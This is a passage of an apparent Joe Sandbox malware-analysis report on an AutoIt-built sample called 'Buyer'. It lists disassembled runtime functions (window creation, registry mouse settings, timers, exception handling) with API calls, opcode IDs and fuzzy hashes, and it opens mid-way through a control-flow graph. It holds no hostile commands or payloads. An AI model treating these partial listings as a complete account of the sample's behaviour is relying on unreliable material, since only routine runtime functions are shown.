call f45a63 752->758 753->739 788 f5b073-f5b085 call f5b46f 753->788 757->708 758->739 810 f9853c-f98552 call f5b46f 758->810 778 f98681-f986a0 call f4d530 760->778 779 f98610-f98613 760->779 761->739 797 f9877d-f9878f call f5b46f 761->797 763->682 765->749 765->750 818 f985cf-f985d8 call f47e30 769->818 819 f985c0-f985cd call f47e30 769->819 825 f98984-f98986 771->825 786 f988d1-f988d5 772->786 787 f988e0-f988eb call f4a344 772->787 778->739 817 f986a6-f986b8 call f5b46f 778->817 794 f98619-f98636 call f4d530 779->794 795 f9899c-f989aa 779->795 813 f98955-f9895d 780->813 814 f98977-f98980 call f4b81d 780->814 786->787 803 f988d7-f988db 786->803 787->771 836 f989cd-f989db 787->836 837 f9857c-f98585 call f4b81d 788->837 838 f5b08b-f5b097 788->838 809 f9880b-f98811 791->809 792->809 794->739 840 f9863c-f9864e call f5b46f 794->840 801 f989ac 795->801 802 f989af-f989bf 795->802 843 f98791-f9879e call f4b81d 797->843 844 f987a0 797->844 801->802 820 f989c1 802->820 821 f989c4-f989c8 802->821 822 f98963-f98965 803->822 809->739 852 f9855f-f9856d call f47e30 810->852 853 f98554-f9855d call f4b81d 810->853 829 f9896a-f98975 call f4a344 813->829 830 f9895f 813->830 814->825 817->739 860 f986be-f986c7 call f5b46f 817->860 861 f985db-f985e6 call f47467 818->861 819->861 820->821 821->744 822->739 825->739 829->814 829->836 830->822 849 f989dd 836->849 850 f989e0-f989e3 836->850 837->741 838->739 863 f98661 840->863 864 f98650-f9865f call f4b81d 840->864 859 f987a4-f987ab 843->859 844->859 849->850 850->692 872 f98570-f98577 852->872 853->872 867 f987ad-f987b2 call f43989 859->867 868 f987b7 call f42f14 859->868 883 f986c9-f986d8 call f4b81d 860->883 884 f986da 860->884 861->739 874 f98665-f98670 call f69314 863->874 864->874 867->739 882 f987bc 868->882 872->739 874->682 888 f98676-f9867c 874->888 882->739 887 f986de-f98701 883->887 884->887 890 f9870f-f98712 887->890 891 f98703-f9870a 887->891 888->739 892 f98722-f98725 890->892 893 f98714-f9871d 890->893 891->890 894 f98735-f98738 892->894 895 f98727-f98730 892->895 893->892 894->739 896 f9873e-f9874c 894->896 895->894 896->739
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                    • API String ID: 0-4285391669
                                                                                                    • Opcode ID: 8aaa9ffeb23b4c92a4244cfe9ac97c13741ff3422fe86db6fdaee93611d46269
                                                                                                    • Instruction ID: 9d0c8206c780732e8a263b7a9ff491300da878801c286e24e7e9e2b460524bf9
                                                                                                    • Opcode Fuzzy Hash: 8aaa9ffeb23b4c92a4244cfe9ac97c13741ff3422fe86db6fdaee93611d46269
                                                                                                    • Instruction Fuzzy Hash: A662AF70508341CFC728DF14C484AAABBE1FF89354F14891EE9998B352DB75D94AEF82
                                                                                                    Function 00F4294B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 933 f4294b-f429bb CreateWindowExW * 2 ShowWindow * 2
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F42979
                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F4299A
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F41727,?), ref: 00F429AE
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00F41727,?), ref: 00F429B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CreateShow
                                                                                                    • String ID: AutoIt v3$edit
                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                    • Opcode ID: 3db04b4123b65190aa009355d050643212868408692d0248a07fea10f0981b16
                                                                                                    • Instruction ID: 0a956f08479ca1a9c9315101482d8ebd25490c5aca9bc57c9b14290be88a0e71
                                                                                                    • Opcode Fuzzy Hash: 3db04b4123b65190aa009355d050643212868408692d0248a07fea10f0981b16
                                                                                                    • Instruction Fuzzy Hash: 15F0FEB16402947AEB3117276C08F373E7ED7CAF50F20805EB944A6264C56E1850EBB0
                                                                                                    Function 00F45033 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F842BC
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F45123
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                    • String ID: Line %d: $AutoIt -
                                                                                                    • API String ID: 2289894680-4094128768
                                                                                                    • Opcode ID: 99574bb17110a36a5f10ae3c7fb2a5b181707a365740ffaee0973ae4e482614a
                                                                                                    • Instruction ID: 9a802c50d3ee568dbb40ea62fca61b9125ccb25b2dd0db2a6d84b9af9fcd4446
                                                                                                    • Opcode Fuzzy Hash: 99574bb17110a36a5f10ae3c7fb2a5b181707a365740ffaee0973ae4e482614a
                                                                                                    • Instruction Fuzzy Hash: F9419471808705ABC321FB60DC85BDF7BD89F85720F10491AF99992192EB38E649E793
                                                                                                    Function 00F431C8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 985 f431c8-f431e8 call f822a0 988 f83330-f83399 call f62690 GetOpenFileNameW 985->988 989 f431ee-f43211 call f43ff7 call f4318a call f43c2f call f4515f 985->989 994 f8339b 988->994 995 f833a2-f833ab call f47467 988->995 1003 f43216-f43219 989->1003 994->995 999 f833b0 995->999 999->999
                                                                                                    APIs
                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00F83391
                                                                                                      • Part of subcall function 00F43FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F43E0E,?,?,00F82A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F44017
                                                                                                      • Part of subcall function 00F4318A: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F431A9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                    • String ID: X$pu$t
                                                                                                    • API String ID: 779396738-2539967330
                                                                                                    • Opcode ID: f28bba534ea5de1d8078a94d67aee9af9cdabe110ec9d3e1f287952bbb7c43f9
                                                                                                    • Instruction ID: da68d716a30b9e3b05c2cb9b0cae45df840c35a3e58653102fa1a5055a06d0b8
                                                                                                    • Opcode Fuzzy Hash: f28bba534ea5de1d8078a94d67aee9af9cdabe110ec9d3e1f287952bbb7c43f9
                                                                                                    • Instruction Fuzzy Hash: 5F218171A002889BDB05DF94DC45BEE7BF8AF48714F00401AE849E7281DBB95A49DB61
                                                                                                    Function 00F44674 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1040 f44674-f4467f 1041 f446f1-f446f3 1040->1041 1042 f44681-f44686 1040->1042 1043 f446e4-f446e7 1041->1043 1042->1041 1044 f44688-f446a0 RegOpenKeyExW 1042->1044 1044->1041 1045 f446a2-f446c1 RegQueryValueExW 1044->1045 1046 f446c3-f446ce 1045->1046 1047 f446d8-f446e3 RegCloseKey 1045->1047 1048 f446d0-f446d2 1046->1048 1049 f446e8-f446ef 1046->1049 1047->1043 1050 f446d6 1048->1050 1049->1050 1050->1047
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00F44667,SwapMouseButtons,00000004,?), ref: 00F44698
                                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00F44667,SwapMouseButtons,00000004,?), ref: 00F446B9
                                                                                                    • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00F44667,SwapMouseButtons,00000004,?), ref: 00F446DB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: Control Panel\Mouse
                                                                                                    • API String ID: 3677997916-824357125
                                                                                                    • Opcode ID: 3d12548f6b5dba1e59b4f037231e6d04b30defd8710c4a0977333fd64cf2926e
                                                                                                    • Instruction ID: 12175546a137249c55169677e312ab4abd9b1d0ba8147adb84b4887488a7f3ed
                                                                                                    • Opcode Fuzzy Hash: 3d12548f6b5dba1e59b4f037231e6d04b30defd8710c4a0977333fd64cf2926e
                                                                                                    • Instruction Fuzzy Hash: 0B112A75511218BFDB208F68DC44EEEBBBCEF45750B11446ABC05E7150E271AE51AB60
                                                                                                    Function 00F4E570 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Variable must be of type 'Object'., xrefs: 00F9384D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                                    • API String ID: 0-109567571
                                                                                                    • Opcode ID: 45433addd065e94b87791e8d1dcc338dbf7a24bfb771ddf38d463040e5508314
                                                                                                    • Instruction ID: 89c583bacb0c704eb47d8f330615d1b32ff21cda8c16be3adf6eb322a6a66f3a
                                                                                                    • Opcode Fuzzy Hash: 45433addd065e94b87791e8d1dcc338dbf7a24bfb771ddf38d463040e5508314
                                                                                                    • Instruction Fuzzy Hash: 1EC27971E00209CFDB24CF58C881BAEBBB1BF18720F248159ED55AB391D779AD41EB91
                                                                                                    Function 00F4F1E0 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 00F50492
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1385522511-0
                                                                                                    • Opcode ID: ab23ee14fd3f77129a0cb6ba61cae8ae9d4b1d115005ee3c170d6db17257e778
                                                                                                    • Instruction ID: 6534fddd6d80f04f1b7f5cafbc304476b9e7becf3b0cc6e2ba6c0d52a8d20e73
                                                                                                    • Opcode Fuzzy Hash: ab23ee14fd3f77129a0cb6ba61cae8ae9d4b1d115005ee3c170d6db17257e778
                                                                                                    • Instruction Fuzzy Hash: F5B27D75A04301CFDB24CF18C480B2ABBE1BB99724F24496DED898B351D775EC49EB92
                                                                                                    Function 00F6012B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00F609B8
                                                                                                      • Part of subcall function 00F635F4: RaiseException.KERNEL32(?,?,?,00F609DA,?,00000000,?,?,?,?,?,?,00F609DA,00000000,01009728,00000000), ref: 00F63654
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00F609D5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                    • String ID: Unknown exception
                                                                                                    • API String ID: 3476068407-410509341
                                                                                                    • Opcode ID: 6b8bd64a13e3757115774de882a783ab82e4c1e5a70980bb95caf3767b9d1295
                                                                                                    • Instruction ID: e2014e68dcda78f4b4ad98b8679fc426a00e9ac0c7d78f692e3e1e1b837d0f5d
                                                                                                    • Opcode Fuzzy Hash: 6b8bd64a13e3757115774de882a783ab82e4c1e5a70980bb95caf3767b9d1295
                                                                                                    • Instruction Fuzzy Hash: 6DF02234D0020D77CB00BAA4EC5699FB76C5F01320F704124B928960A3EF70DE05E6C1
                                                                                                    Function 00FC86E0 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00FC8A7C
                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00FC8A83
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00FC8C64
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 146820519-0
                                                                                                    • Opcode ID: 5f148df491532f3ba5d49953d478920067d9ba1a2a036e2ba5f61ba9ab1c334c
                                                                                                    • Instruction ID: 4f0fb299c0e62a311f739847f50b1086b44aefc33c6a25868857d379af09ec97
                                                                                                    • Opcode Fuzzy Hash: 5f148df491532f3ba5d49953d478920067d9ba1a2a036e2ba5f61ba9ab1c334c
                                                                                                    • Instruction Fuzzy Hash: 89128C71A083019FC714CF28C585B6ABBE1FF84368F04895DE8898B252DB35ED46DF92
                                                                                                    Function 00FC981D Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$_strcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 306214811-0
                                                                                                    • Opcode ID: fca34d7b3525f538bdd6fe460610bd60443afb80acac19118c47be990558f32f
                                                                                                    • Instruction ID: 00c007dbf18b752d2d2748ec65ec0e7715348b9cff770da52600c9761605f91f
                                                                                                    • Opcode Fuzzy Hash: fca34d7b3525f538bdd6fe460610bd60443afb80acac19118c47be990558f32f
                                                                                                    • Instruction Fuzzy Hash: 7CA18131608106DFCB18DF18C596A697BB1FF45314B5084ADE80A9F792DB75ED42EF80
                                                                                                    Function 00F42C6F Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F42ABE
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(00000010,00000000), ref: 00F42AC6
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F42AD1
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F42ADC
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(00000011,00000000), ref: 00F42AE4
                                                                                                      • Part of subcall function 00F42A8D: MapVirtualKeyW.USER32(00000012,00000000), ref: 00F42AEC
                                                                                                      • Part of subcall function 00F42AF5: RegisterWindowMessageW.USER32(00000004,?,00F42E40), ref: 00F42B4D
                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F42EE6
                                                                                                    • OleInitialize.OLE32 ref: 00F42F04
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00F83018
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1986988660-0
                                                                                                    • Opcode ID: f29d50057bedd9ae422d57425755c6609bf15a70147c452a5a704605cd1152fc
                                                                                                    • Instruction ID: 0331efa0085a3e0ad1dac2baecac68a858bd6c11fc3cfd50cfe893db7ac04013
                                                                                                    • Opcode Fuzzy Hash: f29d50057bedd9ae422d57425755c6609bf15a70147c452a5a704605cd1152fc
                                                                                                    • Instruction Fuzzy Hash: A271ADB09412008FC7A8EF79E9A56153FE1FB88304370412AE88AC7359EB3E4441EF55
                                                                                                    Function 00F5FC73 Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F45033: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00F45123
                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00F5FCFC
                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F5FD0B
                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F9FBCA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                    • String ID:
                                                                                                    • API String ID: 3500052701-0
                                                                                                    • Opcode ID: dea1efb0a08617d269e3d3440eba5f54f2f551bb26de4fdd20fe124b062d751c
                                                                                                    • Instruction ID: 491aff08715605975668aaed1e35a8e6dbf52013eba82ba5c0b8491bdf334a32
                                                                                                    • Opcode Fuzzy Hash: dea1efb0a08617d269e3d3440eba5f54f2f551bb26de4fdd20fe124b062d751c
                                                                                                    • Instruction Fuzzy Hash: C631C371904344AFEF72CF34C895BEABBEC9B42318F1404AAD6DA97241C3745A89EB51
                                                                                                    Function 00F789FE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,00F7891C,?,01009CB8,0000000C), ref: 00F78A54
                                                                                                    • GetLastError.KERNEL32(?,00F7891C,?,01009CB8,0000000C), ref: 00F78A5E
                                                                                                    • __dosmaperr.LIBCMT ref: 00F78A89
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 490808831-0
                                                                                                    • Opcode ID: 43d052a100b6645fea9ec4247d12bcdaf55a50e53d30f2a5050b99d604b010e0
                                                                                                    • Instruction ID: 6eb83717cfc204ccbaf93e2b8c2bd81af94ff85274c99492a0d2c4d7a931d1d0
                                                                                                    • Opcode Fuzzy Hash: 43d052a100b6645fea9ec4247d12bcdaf55a50e53d30f2a5050b99d604b010e0
                                                                                                    • Instruction Fuzzy Hash: 8C014C33E551146AEA2462387C4E77D37464B81B74F25811BF90C9B0C2EE7C8C837193
